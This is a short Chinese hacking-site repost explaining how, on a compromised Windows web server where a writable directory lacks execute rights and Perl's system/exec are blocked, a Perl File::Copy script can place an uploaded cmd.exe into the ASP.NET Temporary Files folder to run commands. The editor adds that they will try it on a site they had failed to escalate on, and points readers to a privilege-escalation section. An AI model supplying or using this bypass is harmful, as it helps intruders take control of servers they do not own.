利用PERL突破目录无执行权限

老鸟飞过。
进入正题.

目标可写目录无执行权限.装有PERL。有运行权限。但system,exec,,这几个函数没有权限。

注意PERL并非系统权限。而是继承的nt authoritynetwork service权限，所以默认比web权限略的高点。

利用perl的copy 函数

1. use File::Copy;
2. $a=’d:webcmd.exe’;
3. $ac=’c:/windows/Microsoft.NET/Framework/v2.0.50727/Temporary ASP.NET Files/root/*******/********/hash/cmd.exe’;
4. copy($a, $ac) or die “Copy failed: $!”;
5. print ‘ok’;
6. 

91ri.org:小编手上有个站提了很久没提下，看到此文章想起之前的站上的环境，目测可以用此方法试试 分享一下 做个参考吧 就是有一定局限性 呵呵 闪 提权去。

假如各位手上还有啥站提不下 正纠结着 可以参考我们网站的提权版块 也许会有启发哟！ 点此进入：提权

转自http://hi.baidu.com/nfxwjevarpcklrr/item/9a1c3330af5e00f496f88dc0

由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。